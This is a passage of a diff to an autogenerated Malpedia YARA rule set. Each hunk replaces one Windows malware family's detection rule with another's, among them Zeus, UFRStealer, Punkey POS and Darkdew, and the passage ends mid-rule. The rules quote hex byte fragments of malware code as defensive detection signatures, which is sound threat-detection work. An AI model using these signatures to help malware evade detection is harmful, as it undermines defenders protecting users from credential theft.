"https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wastedloader_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_110_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e6299dacb3891024e6699f166db0ecba511abe3e26d2cc6dc9ddd0929ba5121a" + logic_hash = "d08f798b1cfbec1be54b7df96bb36676a27b486448d2260bb80e971ad4c99ec2" score = 75 quality = 75 tags = "FILE" @@ -155194,32 +158095,32 @@ rule MALPEDIA_Win_Wastedloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b748 00ee 0be6 3bf6 2014dd33b89819 220f } - $sequence_1 = { 0fb7485e 83e954 8b55f8 66894a5e } - $sequence_2 = { fc b802ec0000 8d6825 94 01dc 00e8 45 } - $sequence_3 = { b802ec0000 8d6825 94 01dc 00e8 45 } - $sequence_4 = { ec 7ac4 f8 ae fc } - $sequence_5 = { 32705b 39e1 108792ff9b95 8abf2ec8650b } - $sequence_6 = { 1a00 0071bf 7303 1f c8be8de8 1be8 692405008008202c00700d } - $sequence_7 = { 66894118 8b55f8 0fb74218 83e854 8b4df8 66894118 ba8d000000 } - $sequence_8 = { 2cbe 832061 5b 5b } - $sequence_9 = { 30ac06e68bfc49 23f7 b754 7c49 27 59 } + $sequence_0 = { ff5638 4839d8 756f 488b37 ba08000000 4889f9 e8???????? } + $sequence_1 = { 7809 488d1542850a00 59 c3 b907000000 cd29 0f0b } + $sequence_2 = { 8b842440010000 898424f0000000 0f28842420010000 0f288c2430010000 0f298c24e0000000 0f298424d0000000 8b8424c8000000 } + $sequence_3 = { 884710 4883670800 c6471100 488d542428 48891a 4c8d052abf0e00 eb3e } + $sequence_4 = { 488d95100a0000 48c70208000000 488d8d70120000 e8???????? e9???????? 4c8bb568130000 6a0c } + $sequence_5 = { 488d8c24f0010000 e8???????? 41bf01000000 e9???????? 488dac2460010000 488b4530 4889842400010000 } + $sequence_6 = { 4c89fa 4989c0 e8???????? 488b8698000000 4801d8 483b8690000000 7763 } + $sequence_7 = { 89ca b101 e9???????? b103 e9???????? 4c8b01 410fb64810 } + $sequence_8 = { ffe1 31c9 4883bc241801000004 0f84f8620000 488b942448030000 488b32 4883fe02 } + $sequence_9 = { eb02 31c0 4883c428 c3 4c8d0df4bf0900 4889c1 4c89c2 } condition: - 7 of them and filesize <2677760 + 7 of them and filesize <3217408 } -rule MALPEDIA_Win_Tonedeaf_Auto : FILE +rule MALPEDIA_Win_Darkdew_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5115d077-589f-5849-9e66-466eacfeb8fa" + id = "0ed49e32-b5ea-5f63-b18e-3ccfdc3576f0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tonedeaf_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkdew_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "05f38897859076fdc96710dcc7b02a4e168a1e7a497536a51feb5fc01846d4dd" + logic_hash = "0cd505ddc1a03cf19308335c9ef43a0054cd013c3658d925b20aa0cf71f6aa36" score = 75 quality = 75 tags = "FILE" @@ -155233,32 +158134,32 @@ rule MALPEDIA_Win_Tonedeaf_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 56 ff15???????? 56 ff15???????? 56 e8???????? } - $sequence_1 = { 2bf1 8bc3 46 d1e8 } - $sequence_2 = { 8bc3 46 d1e8 33d2 } - $sequence_3 = { 8b45ec 85c0 740b 6a08 50 } - $sequence_4 = { 884c32ff 84c9 75f3 8bf3 8a03 43 84c0 } - $sequence_5 = { 8b5004 8d4af8 898c153cffffff 8d45a8 c745fc01000000 50 } - $sequence_6 = { 56 6a00 ff15???????? 56 ff15???????? 56 ff15???????? } - $sequence_7 = { 83f801 732f 8b0f 8bc1 } - $sequence_8 = { 0f57c0 c745dc00000000 33c0 660fd645d4 33db 8945d8 } - $sequence_9 = { 75f3 8bf3 8a03 43 84c0 75f9 } + $sequence_0 = { 8b55d0 c745b400000000 c745b80f000000 c645a400 83fa08 722e 8b4dbc } + $sequence_1 = { 03c0 660f283485c0840110 baef7f0000 2bd1 } + $sequence_2 = { 7202 8b12 8bca c745ac00000000 33c0 c745b007000000 } + $sequence_3 = { 8d4d9c 8d45d4 c78586feffff00000000 0f434d9c ba14060000 } + $sequence_4 = { c645fc11 8b55cc 83fa08 7232 8b4db8 8d145502000000 8bc1 } + $sequence_5 = { 6a00 ff15???????? cc 55 8bec 64a100000000 6aff } + $sequence_6 = { b991000000 8dbc2470020000 8bf3 f3a5 8bf0 8dbc24b4040000 8d842480030000 } + $sequence_7 = { e8???????? 8bf8 c645fc19 8d55d4 837de810 } + $sequence_8 = { 85c0 0f8488000000 8b4df8 8d5823 8b55fc } + $sequence_9 = { 8db3d0feffff 8bce 83e210 8d7901 0f1f4000 } condition: - 7 of them and filesize <851968 + 7 of them and filesize <279552 } -rule MALPEDIA_Win_Flowershop_Auto : FILE +rule MALPEDIA_Win_Ratankba_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8ec68082-5d4c-584e-ad88-66456b2a097b" + id = "fd423e85-7c69-52a0-9324-ef5e9762e7e8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flowershop_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ratankba_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "f019e2c8acff91329c227db3e65589276d7267039537efb349a1a4ca0b28047b" + logic_hash = "49523307c1fdb5d69527def26960d83b0ac500a3f11bec0bed9b0e81e333a8ec" score = 75 quality = 75 tags = "FILE" @@ -155272,32 +158173,32 @@ rule MALPEDIA_Win_Flowershop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f857d030000 e9???????? 8325????????00 8b15???????? 85d2 760b 8bca } - $sequence_1 = { ff750c ff15???????? 8bf0 d1e6 0fb7c6 50 8d470a } - $sequence_2 = { 33f6 85c0 761e bb???????? 53 57 e8???????? } - $sequence_3 = { 8b45f0 8b3d???????? 8db008010000 56 6a08 ffd7 50 } - $sequence_4 = { 33ff 80240100 217dfc 8d450c 50 8d4508 50 } - $sequence_5 = { 85c0 740a 3b4514 7705 6a01 58 eb02 } - $sequence_6 = { c3 895104 c3 56 8b742408 57 8b4604 } - $sequence_7 = { e8???????? 33c0 eb7b 6a01 5e 837c241005 7c5e } - $sequence_8 = { 33c0 5f 2bd1 c7450824000000 3b7d0c 7712 8b5c0afc } - $sequence_9 = { 33f6 eb4b 8b7d08 3b7dfc 741c 8d45fc 50 } + $sequence_0 = { 5d c20800 8b4d0c 803900 7416 807d0b00 7410 } + $sequence_1 = { 53 b8???????? 668911 e8???????? 8d8ec0000000 c645fc05 33c0 } + $sequence_2 = { 53 ff15???????? 85c0 740e 8b45fc 85c0 7407 } + $sequence_3 = { 55 8bec ff4724 8b4724 53 56 394718 } + $sequence_4 = { e8???????? 8b4310 33ff 3bc7 7649 397e10 7644 } + $sequence_5 = { 720a b857000780 e8???????? 8b4b04 5f 8944d104 8bc2 } + $sequence_6 = { 83c414 85c0 744f 8bc8 e8???????? 8bf0 a1???????? } + $sequence_7 = { 0f849b010000 83c302 46 ebaa 8b5710 8bc6 8955e4 } + $sequence_8 = { 8975f4 85f6 790b 5e 83c8ff 5b 8be5 } + $sequence_9 = { 56 66898578efffff 51 83c8ff 8dbd78efffff c7858cefffff07000000 } condition: - 7 of them and filesize <829440 + 7 of them and filesize <303104 } -rule MALPEDIA_Win_Chiser_Client_Auto : FILE +rule MALPEDIA_Win_Apocalipto_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e8afcaec-169c-5519-a609-4458271450b4" + id = "ee7a0f0d-5a8b-59ea-a6c9-35fc5d51d457" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chiser_client" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chiser_client_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.apocalipto_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "3bc0569053961dd359f1e4296146fed96a2d550b29a6ec46396d68a2c22beadc" + logic_hash = "ab10b935b7f8e9ea80933c4818fa1b5859216a7e2d022a7818f118074140bb2a" score = 75 quality = 75 tags = "FILE" @@ -155311,34 +158212,34 @@ rule MALPEDIA_Win_Chiser_Client_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 668945b7 488d55b7 488d4dd7 e8???????? b862000000 } - $sequence_1 = { 488bcb e8???????? b801000000 4883c430 415e 5f } - $sequence_2 = { e8???????? 488d156f390300 488d4c2420 e8???????? cc 48895c2408 4889742410 } - $sequence_3 = { ff15???????? 483305???????? 488d15bedf0200 488bcb 488905???????? } - $sequence_4 = { 894810 48634810 b802000000 48f7e1 48c7c1ffffffff 480f40c1 } - $sequence_5 = { ff15???????? 8bd8 83f801 0f84c7030000 8bc8 83e902 } - $sequence_6 = { 4c8d0564070000 eb1e 3d03003000 7509 } - $sequence_7 = { 488bc8 488d15a48e0100 ff15???????? 4885c0 0f8432030000 488bc8 e8???????? } - $sequence_8 = { 488944246a 89442472 6689442476 c74424502f006900 c74424546e006400 c744245865007800 c744245c2e006800 } - $sequence_9 = { 488d1590500200 488d4d20 e8???????? cc 48895d08 4883651000 488b86a8000000 } + $sequence_0 = { 880e b967666666 89d8 f7e9 89d1 c1f902 } + $sequence_1 = { 8817 41 47 39f1 75f5 c6040800 5b } + $sequence_2 = { c7042400000000 ff15???????? 52 8985ccf3ffff e8???????? 2500f0ffff 8d9800f0ffff } + $sequence_3 = { 8b5584 29f2 89542404 893c24 e8???????? c745e400000000 } + $sequence_4 = { 8b4154 89442408 895c2404 893424 } + $sequence_5 = { 83ec2c 8b4d08 8b450c 85c0 0f849d000000 } + $sequence_6 = { e8???????? 8d95e8f7ffff 89542404 893c24 e8???????? 89c2 85c0 } + $sequence_7 = { 8d3c10 31c9 8a140b 8817 } + $sequence_8 = { 891c24 ff15???????? 83ec08 a3???????? 85c0 0f8497080000 } + $sequence_9 = { 0f84cb080000 c7442404???????? 891c24 ff15???????? 83ec08 a3???????? 85c0 } condition: - 7 of them and filesize <714752 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Rcs_Auto : FILE +rule MALPEDIA_Win_Retefe_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "897f58a2-dc22-5f97-b551-4f423c0a43b4" + id = "f3caa6e6-3618-52a1-825b-c9f70c1ac6ab" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rcs_auto.yar#L1-L180" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.retefe_auto.yar#L1-L263" license_url = "N/A" - logic_hash = "6868fef137d3b17f3a70ffb34345814aa00441ab2e72c702d2e7f970155b6f03" + logic_hash = "60c0df86aaa8e365109479b1ca3f3fca53ccf95fd2fbd33ae20876e0704e51b2" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -155350,40 +158251,51 @@ rule MALPEDIA_Win_Rcs_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6880000000 6a01 6a00 6a05 } - $sequence_1 = { 8944245e 89442462 89442466 8944246a } - $sequence_2 = { 85ff 0f84d4000000 57 e8???????? } - $sequence_3 = { e8???????? 83c430 6aff 68???????? } - $sequence_4 = { ff15???????? 5f 5e 5d 5b 33c0 } - $sequence_5 = { 40 68???????? 50 e8???????? 83c40c eb0d } - $sequence_6 = { 81f1f3221c6a 41 f7c7073ed86f f8 f9 } - $sequence_7 = { 742d 8b7d08 8bbfdc000000 b81c010000 f765fc 8985c0feffff } - $sequence_8 = { 81f1ff2fe523 80f973 66f7c5db7a f5 } - $sequence_9 = { 83f907 773d ff248d6872f301 4f } - $sequence_10 = { 8945f4 eb1c 8b86dc000000 8b9014120000 0fb7781c c1e704 8b3c17 } - $sequence_11 = { 83f906 775c ff248d602ef001 c705????????803e0000 } - $sequence_12 = { 6a0e 6a00 ff75dc e8???????? 83c40c } - $sequence_13 = { 0fb7b810120000 c1e704 8b8d48f4fbff 83c103 0fb78c8870020000 c1e104 8b0c11 } - $sequence_14 = { 8b37 81c6c8020000 56 ff75fc ff5704 } - $sequence_15 = { 8b75ec 0375f8 8b5e0c 39df 7235 035e08 } - $sequence_16 = { 8bbfdc000000 8b7730 897734 ff7518 } - $sequence_17 = { 8b55fc 8b45f8 52 50 8b7d08 ff97a0000000 } + $sequence_0 = { 6a00 6a01 ff15???????? 8bf0 85f6 7410 6a09 } + $sequence_1 = { 51 8bf8 ffd6 85c0 } + $sequence_2 = { 68f5000000 50 ff15???????? b801000000 } + $sequence_3 = { e8???????? 6a08 e8???????? 894604 } + $sequence_4 = { 6a24 6a5a 6a24 e8???????? 81c494000000 } + $sequence_5 = { 8b4e04 8901 8b4e04 33c0 83c404 394104 } + $sequence_6 = { 6a0e 6aeb 6a1a 6a96 6a0d } + $sequence_7 = { 894604 83c404 8bc6 e8???????? } + $sequence_8 = { 51 ff15???????? 8b95d8efffff 50 52 ff15???????? 50 } + $sequence_9 = { 52 e8???????? 8b4e04 8901 } + $sequence_10 = { 6ad1 6a1a 6a55 6ad7 6ad1 } + $sequence_11 = { 880c10 8b4e04 40 3b4104 } + $sequence_12 = { 50 e8???????? 83c408 e8???????? 99 b960f59000 } + $sequence_13 = { 8bec 837d0c00 7409 b80b000280 } + $sequence_14 = { 56 33f6 8b86a0bf4200 85c0 740e } + $sequence_15 = { 43 85ff 0f851fffffff 5f } + $sequence_16 = { 6a00 ffb42424200000 e8???????? 8b8c2418200000 } + $sequence_17 = { 8b0495a0bf4200 f644082801 7421 57 e8???????? } + $sequence_18 = { 46 85f6 7410 83fe01 75a0 } + $sequence_19 = { 0fb611 0fb6c0 eb17 81fa00010000 7313 8a87ccb14200 } + $sequence_20 = { 8b742414 85f6 7553 32c0 } + $sequence_21 = { 57 81fb00020000 0f8daa000000 6800080000 } + $sequence_22 = { 8b4218 a3???????? 8b4a08 890d???????? 8b420c } + $sequence_23 = { 33c0 668906 8b7c2414 8d5f20 } + $sequence_24 = { e8???????? 8b404c 83b8a800000000 7512 8b04bda0bf4200 807c302900 7504 } + $sequence_25 = { 88048d93404300 88048d923c4300 84d2 7412 } + $sequence_26 = { 8b7004 8b38 4e 8bce e8???????? } + $sequence_27 = { 8b4d08 85c9 7512 e8???????? 5e } + $sequence_28 = { 5f 894df0 8b34cd58224100 8b4d08 6a5a 2bce } condition: - 7 of them and filesize <11501568 + 7 of them and filesize <843776 } -rule MALPEDIA_Win_Redshawl_Auto : FILE +rule MALPEDIA_Win_Hacksfase_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6da43ccb-6114-536f-a2d4-a0a197b8eb4b" + id = "efd0a25a-4cca-56d9-81da-25a62e74a476" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redshawl_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hacksfase_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "b081202974eb2cc07597ec5bbbc48f26672d398acc6550f420b42ca3feedcaae" + logic_hash = "cb98da9c56e02049453f68129b331881a66f9a471f383d0aefdbab19d12d9c15" score = 75 quality = 75 tags = "FILE" @@ -155397,32 +158309,32 @@ rule MALPEDIA_Win_Redshawl_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffc6 488d0c80 488d05baaa0000 488d0cc8 48890f ff15???????? 85c0 } - $sequence_1 = { e8???????? 488b8b58010000 e8???????? 488d7b58 be06000000 488d0519c30000 483947f0 } - $sequence_2 = { 488bce 488bc6 488d15709a0000 83e11f } - $sequence_3 = { 488b8b58010000 e8???????? 488d7b58 be06000000 488d0519c30000 } - $sequence_4 = { e9???????? 4c8d2552940000 488b0d???????? eb7c } - $sequence_5 = { eb76 33c9 488d1543bb0000 48891401 4883c230 4883c108 48ffcb } - $sequence_6 = { 8905???????? 8b430c 8905???????? 8bd7 4c8d0520d1ffff 89542420 } - $sequence_7 = { 8bd8 488bcf ff15???????? 488b742438 8bc3 } - $sequence_8 = { 72ed 48833d????????00 741f 488d0dc2c10000 e8???????? 85c0 } - $sequence_9 = { 4c8d251ac70000 4863f8 49833cfc00 752b b900100000 } + $sequence_0 = { 81ec1c080000 53 55 56 57 6a1c 32db } + $sequence_1 = { 897ddc 8b45d0 03c0 8945d0 8d4dd0 51 } + $sequence_2 = { 53 51 ff7628 895dbc 895dc4 895dc0 895dc8 } + $sequence_3 = { 895008 8b4120 8b5508 895020 8b4120 } + $sequence_4 = { 85c0 7509 b908000000 8bfb } + $sequence_5 = { a806 746c b9???????? c78424bc02000003000000 c78424c002000002000000 c78424c4020000ffffffff c78424b802000010000000 } + $sequence_6 = { ffd6 85c0 740a 33c0 5e 81c490010000 } + $sequence_7 = { 83ec18 8b4120 56 33f6 } + $sequence_8 = { 89842418040000 e8???????? b9???????? e8???????? } + $sequence_9 = { ff75f0 ffd7 6a18 e8???????? } condition: - 7 of them and filesize <174080 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE +rule MALPEDIA_Win_Punkey_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1046d98a-4609-5bec-b876-b018dbb80d3c" + id = "846510df-399c-5c73-991a-33d5b6390d78" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dorkbot_ngrbot_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.punkey_pos_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "bcb266c989d4cc3b19fa74f0744a29c545b0b246dcbae9914be22d057afdb410" + logic_hash = "afbb6da5e69098feb647a1b39faf19c917a9fcb87281ef711eecf3479b712e35" score = 75 quality = 75 tags = "FILE" @@ -155436,32 +158348,32 @@ rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a5c 56 e8???????? 8b5d0c 6a5c 53 8bf8 } - $sequence_1 = { ffd6 33c0 a3???????? a3???????? a3???????? 8b45fc } - $sequence_2 = { c1e704 8b8f84693a02 48 3bc8 0f8289000000 68???????? 8d45ec } - $sequence_3 = { 3bc6 751a 8b00 898120100000 8b0a 8bb920100000 56 } - $sequence_4 = { 8b4508 50 8d8da4fdffff 51 68???????? 8d958cf7ffff 6817060000 } - $sequence_5 = { 8b15???????? 8b1d???????? 6a08 52 ffd3 6804010000 8906 } - $sequence_6 = { 0145fc ffd3 8bc8 b8d34d6210 f7e1 c1ea06 } - $sequence_7 = { 6689462d 83c007 66898638100000 5f 895628 c6462c03 b801000000 } - $sequence_8 = { 53 8d55d4 52 ffd6 85c0 7fdb 5f } - $sequence_9 = { 0fb6c9 6880000000 83c202 52 8b5508 f7d9 1bc9 } + $sequence_0 = { ffd7 a3???????? 85c0 74ae 5f } + $sequence_1 = { 8bec 837d0c01 56 57 756b } + $sequence_2 = { 837d0c01 56 57 756b 8b4508 } + $sequence_3 = { ff15???????? 8bf0 85f6 7508 5f 33c0 5e } + $sequence_4 = { 33c0 5e 5d c20c00 8b3d???????? } + $sequence_5 = { 68e7070000 50 ff15???????? ff05???????? 8b0d???????? } + $sequence_6 = { 55 8bec 8b4508 85c0 7919 8b4d10 8b550c } + $sequence_7 = { 6a02 a3???????? ff15???????? a3???????? 33c0 } + $sequence_8 = { 52 50 a1???????? 50 ff15???????? 5d c20c00 } + $sequence_9 = { 8bf0 85f6 7508 5f 33c0 5e } condition: - 7 of them and filesize <638976 + 7 of them and filesize <499712 } -rule MALPEDIA_Win_Alureon_Auto : FILE +rule MALPEDIA_Win_Redyms_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d906ba05-9af9-5358-abd3-33a25815a15f" + id = "da0046e8-7d1d-55ff-bc47-8c4a49be473c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alureon_auto.yar#L1-L161" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redyms_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "69c2ddac38bf20f21fb2d59f504ac16289e135ccaf5d5c616ac40bfbb62cd466" + logic_hash = "5d36da1238e7bd61b571d2194e775b3f30f76bd59bc3908f725087cbecb38f2e" score = 75 quality = 75 tags = "FILE" @@ -155475,38 +158387,32 @@ rule MALPEDIA_Win_Alureon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 59 32c0 8d7c2420 f3aa 8b4d14 } - $sequence_1 = { 3b442410 75cf 33c0 5f 5e 5b c20800 } - $sequence_2 = { 6800001000 8d45f8 50 c745d818000000 } - $sequence_3 = { 68000010c0 8d45fc 50 c745d818000000 } - $sequence_4 = { 6800000080 6a03 56 6a01 } - $sequence_5 = { 41 8bca 49 ffc7 } - $sequence_6 = { 2bc8 03cf 8908 eb2f 837dfc05 751c } - $sequence_7 = { 6800005600 8d45d0 50 53 } - $sequence_8 = { 53 ff15???????? 8945f8 56 } - $sequence_9 = { c745f000010000 749d ff75e8 ff15???????? } - $sequence_10 = { 66a5 8d85a8feffff 50 68???????? a4 } - $sequence_11 = { 741c 8d85e4fbffff 50 8d85f8feffff 50 } - $sequence_12 = { 837dfc0a 7cc0 eb32 8bc3 } - $sequence_13 = { 50 33f6 46 56 8d8424cc000000 50 } - $sequence_14 = { 8d8424ec010000 50 68???????? ff15???????? 85c0 0f84f2020000 } - $sequence_15 = { ff15???????? 85c0 7409 39b424c8000000 75cf 53 53 } + $sequence_0 = { 32d8 80f3fb 8819 40 41 6683f805 72ee } + $sequence_1 = { 8b4604 50 6a00 ffd3 50 ffd7 56 } + $sequence_2 = { 33c5 8945fc 56 8b35???????? 8d4ddc 8bd1 } + $sequence_3 = { 85f6 0f84e4000000 8b3d???????? 8d4de8 8bd1 33c0 } + $sequence_4 = { a1???????? 33c5 8945fc 56 c785ccfeffff04010000 7203 } + $sequence_5 = { c745d000000000 ff15???????? 5f 85c0 } + $sequence_6 = { 7417 8b45f4 8b4df8 50 51 56 ff15???????? } + $sequence_7 = { 8b4608 8b4e04 50 6a00 e8???????? 83c408 } + $sequence_8 = { 83c8ff 5b 8be5 5d c3 8bc6 5f } + $sequence_9 = { 8d5828 53 8945fc ffd7 83caff 8bc6 f00fc110 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Stresspaint_Auto : FILE +rule MALPEDIA_Win_Ufrstealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1abc90df-5501-5268-be5d-9ffd5264cf78" + id = "87df7a80-59b4-5e49-9e5c-787423bd5a1a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stresspaint_auto.yar#L1-L151" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ufrstealer_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "34d2cc78b8a1b3b96faf71dac1e0e5a144bca4946a3f4a475da9ab8b6bdc6c9b" + logic_hash = "bbd8353728980ed7d41eeaaf6b45527dc201d1c8bc1c51c590cb1fee36b76ae8" score = 75 quality = 75 tags = "FILE" @@ -155520,40 +158426,34 @@ rule MALPEDIA_Win_Stresspaint_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0103 014510 294514 83665800 } - $sequence_1 = { 8d540208 8908 8d4a04 8a5202 51 } - $sequence_2 = { 8d540203 3bea 7e4d 8b6c241c } - $sequence_3 = { 0106 83560400 837d1c00 7494 } - $sequence_4 = { 0103 ebaa 8b442408 56 } - $sequence_5 = { 0103 014510 294674 8b4674 } - $sequence_6 = { 0107 115f04 3bcb 7508 } - $sequence_7 = { 0108 8b8e44010000 114804 8b4f18 } - $sequence_8 = { 0107 83570400 85c9 7508 } - $sequence_9 = { 010b 8945fc 8bc2 83530400 } - $sequence_10 = { 8d5318 c7432400200000 66897312 c6431100 890a } - $sequence_11 = { 8d540201 52 51 6a39 55 } - $sequence_12 = { 8d540101 8bc5 89542430 8b542450 } - $sequence_13 = { 8d5338 3b02 740a 41 83c250 3bcf } - $sequence_14 = { 8d540201 8915???????? 33c0 8bd6 } - $sequence_15 = { 8d540208 8b4500 c70100000000 8b4c2430 } + $sequence_0 = { 6a01 6a00 6a00 68???????? 6a00 68???????? ff15???????? } + $sequence_1 = { 0bc0 7529 8b43fc 03d8 8b03 83c304 83f8ff } + $sequence_2 = { ffb5ecf3ffff ff15???????? 5b 5f 5e c9 } + $sequence_3 = { 894df4 8b75f4 83ee01 c745f008000000 0fb64eff 0fb616 83f97f } + $sequence_4 = { 03c1 80383a 7505 c60000 eb03 49 } + $sequence_5 = { ff35???????? ff15???????? 85c0 0f842debffff a3???????? 68???????? ff15???????? } + $sequence_6 = { 0f85c0000000 0fb60d???????? a1???????? 8808 8305????????01 894dfc bb???????? } + $sequence_7 = { 8d45dc 6a04 50 e8???????? 8305????????04 e8???????? } + $sequence_8 = { 50 68???????? 68???????? 6a00 ff15???????? 68???????? ff15???????? } + $sequence_9 = { c745d80e000000 33c0 8b75d8 8bc8 8db65c884200 } condition: - 7 of them and filesize <1155072 + 7 of them and filesize <770048 } -rule MALPEDIA_Win_Gcman_Auto : FILE +rule MALPEDIA_Win_Zeus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c3dd4f52-d013-5409-b72e-5ec2ecf28c4b" + id = "7fc58452-b8ed-5f5d-9c4b-1944a46dd13e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gcman_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_auto.yar#L1-L231" license_url = "N/A" - logic_hash = "646fd6c677e3b810f35c02ba75646dde96abf31f60dd053593e8964313629ea3" + logic_hash = "9dc359b19db229cc8d91a3a8afe15f58c5fe776d823ff66891a661f0a8422765" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -155565,34 +158465,48 @@ rule MALPEDIA_Win_Gcman_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { a1???????? 8944240c c7442408???????? 8b85d0ebffff } - $sequence_1 = { 0375e0 01f1 81e959dc6b54 c1c10f 01d9 89c6 } - $sequence_2 = { 89442408 c7442404???????? 8d8528eaffff 890424 e8???????? } - 